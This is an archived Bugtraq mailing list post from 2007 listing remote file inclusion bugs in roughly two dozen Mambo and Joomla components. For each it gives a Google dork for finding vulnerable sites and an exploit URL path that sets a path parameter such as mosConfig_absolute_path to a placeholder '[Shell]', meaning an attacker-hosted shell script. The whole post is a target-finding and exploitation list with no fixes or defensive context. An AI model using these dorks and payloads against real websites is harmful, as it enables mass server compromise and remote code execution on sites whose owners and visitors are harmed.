Home page logo
/

bugtraq logo Bugtraq mailing list archives

All Of the Mambo & Joomla Script Remote File Inclussion Bugs..
From: spymeta () yahoo com
Date: 22 Jun 2007 09:36:26 -0000

Hi every body...
There are some Remote File Inclussion bugs on Mamabo & Joomla Script...

You can search ;
ex: inurl:[Dork] , [dork], allinurl:[dork] on google or the other search sites..


Dork:

com_comprofiler

Expl:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell]



Dork:
inurl:com_multibanners

Expl:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:com_colophon

expl:
administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]


Dork:

inurl:index.php?option=[Shell]com_simpleboard

Expl:
/components/com_simpleboard/file_upload.php?sbp=[Shell]

Dork:

inurl:"com_hashcash"


Expl:
/components/com_hashcash/server.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_htmlarea3_xtd-c"

Expl:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_sitemap"

Expl:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell]

--
Dork:
inurl:"com_forum"

Expl:
/components/com_forum/download.php?phpbb_root_path=[Shell]
--
Dork:
inurl:"com_pccookbook"

Expl:
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:index.php?option=[Shell]com_extcalendar

Expl:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"minibb"

Expl:
/components/minibb/index.php?absolute_path=[Shell]
-
Dork:
inurl:"com_smf"

Expl:
/components/com_smf/smf.php?mosConfig_absolute_path=[Shell]


Expl:
/modules/mod_calendar.php?absolute_path=[Shell]

Dork:
inurl:"com_pollxt"

Expl:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_loudmounth"

Expl:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_videodb"

Expl:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:index.php?option=[Shell]com_pcchess

Expl:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_multibanners"

Expl:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]


Dork:
inurl:"com_a6mambohelpdesk"

Expl:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=[Shell]

Dork:
inurl:"com_colophon"

Expl:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_mgm"

Expl:
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_mambatstaff"

Expl:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell]

Dork:
inurl:"com_securityimages"

Expl:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell]

Expl:
/components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell]


Dork:
inurl:"com_artlinks"

Expl:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_galleria"

Expl:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]

by SPYMETA

Mail & MSN : spymeta () yahoo com


  By Date           By Thread  

Current thread:
  • All Of the Mambo & Joomla Script Remote File Inclussion Bugs.. spymeta (Jun 22)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]